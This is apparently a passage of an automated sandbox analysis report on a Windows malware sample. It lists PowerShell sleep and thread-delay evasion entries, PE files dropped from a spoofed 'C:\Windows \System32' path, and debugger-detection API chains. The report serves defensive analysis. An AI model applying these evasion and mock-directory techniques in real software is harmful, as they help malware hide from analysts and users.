Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5358Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4446Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7399Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2183Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7662Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1872Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7303
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2206
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7723
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1980
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7262
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2352
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7510
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2051
Source: C:\Windows \System32\printui.exeDropped PE file which has not been started: C:\Windows\System32\vcruntime140d.dllJump to dropped file
Source: C:\Windows \System32\printui.exeDropped PE file which has not been started: C:\Windows\System32\ucrtbased.dllJump to dropped file
Source: C:\Windows\System32\svchost.exeDropped PE file which has not been started: C:\Windows\System32\winsvcf\x549596.datJump to dropped file
Source: C:\Windows\System32\svchost.exeAPI coverage: 1.4 %
Source: C:\Windows\System32\console_zero.exeAPI coverage: 1.5 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6700Thread sleep count: 5358 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6700Thread sleep count: 4446 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5852Thread sleep time: -6456360425798339s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1448Thread sleep count: 7399 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1448Thread sleep count: 2183 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7108Thread sleep time: -2767011611056431s >= -30000sJump to behavior
Source: C:\Windows\System32\timeout.exe TID: 5852Thread sleep count: 83 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4528Thread sleep count: 7662 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4528Thread sleep count: 1872 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3364Thread sleep time: -8301034833169293s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5988Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5908Thread sleep count: 7303 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5908Thread sleep count: 2206 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5288Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\console_zero.exe TID: 5372Thread sleep time: -46000s >= -30000s
Source: C:\Windows\System32\timeout.exe TID: 7056Thread sleep count: 116 > 30
Source: C:\Windows\System32\timeout.exe TID: 632Thread sleep count: 132 > 30
Source: C:\Windows\System32\console_zero.exe TID: 5580Thread sleep time: -46000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5556Thread sleep count: 7723 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1492Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3536Thread sleep count: 1980 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6856Thread sleep count: 7262 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6856Thread sleep count: 2352 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6744Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3580Thread sleep count: 7510 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3776Thread sleep count: 2051 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3392Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeCode function: 26_2_64946F50 GetSystemTimeAdjustment followed by cmp: cmp ecx, 03h and CTI: jle 64946F63h26_2_64946F50
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB039A40 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,26_2_00007FFBAB039A40
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB0398FC FindClose,FindFirstFileExW,GetLastError,26_2_00007FFBAB0398FC
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F2AC5F4 FindClose,FindFirstFileExW,GetLastError,32_2_00007FF70F2AC5F4
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F2AC668 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,32_2_00007FF70F2AC668
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\svchost.exeThread delayed: delay time: 60000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\console_zero.exeThread delayed: delay time: 46000
Source: C:\Windows\System32\console_zero.exeThread delayed: delay time: 46000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: svchost.exe, 0000001A.00000002.2847004878.0000013B8442B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\58VSNPxrI4.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Found API chain indicative of debugger detection
Source: C:\Windows\System32\svchost.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleepgraph_26-81271
Source: C:\Windows\System32\svchost.exeCode function: 26_2_649461C0 IsDebuggerPresent,RaiseException,26_2_649461C0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAF9FC30 GetModuleHandleW,GetProcAddress,wcspbrk,LoadLibraryW,GetProcAddress,GetSystemDirectoryW,GetSystemDirectoryW,LoadLibraryW,32_2_00007FFBBAF9FC30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows \System32\printui.exeCode function: 13_2_00007FF616B11880 SetUnhandledExceptionFilter,13_2_00007FF616B11880
Source: C:\Windows \System32\printui.exeCode function: 13_2_00007FF616B11B5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_00007FF616B11B5C
Source: C:\Windows\System32\svchost.exeCode function: 26_2_64947650 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,26_2_64947650
Source: C:\Windows\System32\svchost.exeCode function: 26_2_6828C940 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,26_2_6828C940
Source: C:\Windows\System32\svchost.exeCode function: 26_2_68295201 SetUnhandledExceptionFilter,26_2_68295201
Source: C:\Windows\System32\svchost.exeCode function: 26_2_682A14E8 SetUnhandledExceptionFilter,26_2_682A14E8
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB0499E8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_00007FFBAB0499E8
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB03BFA0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,26_2_00007FFBAB03BFA0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB49EE70 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,26_2_00007FFBAB49EE70
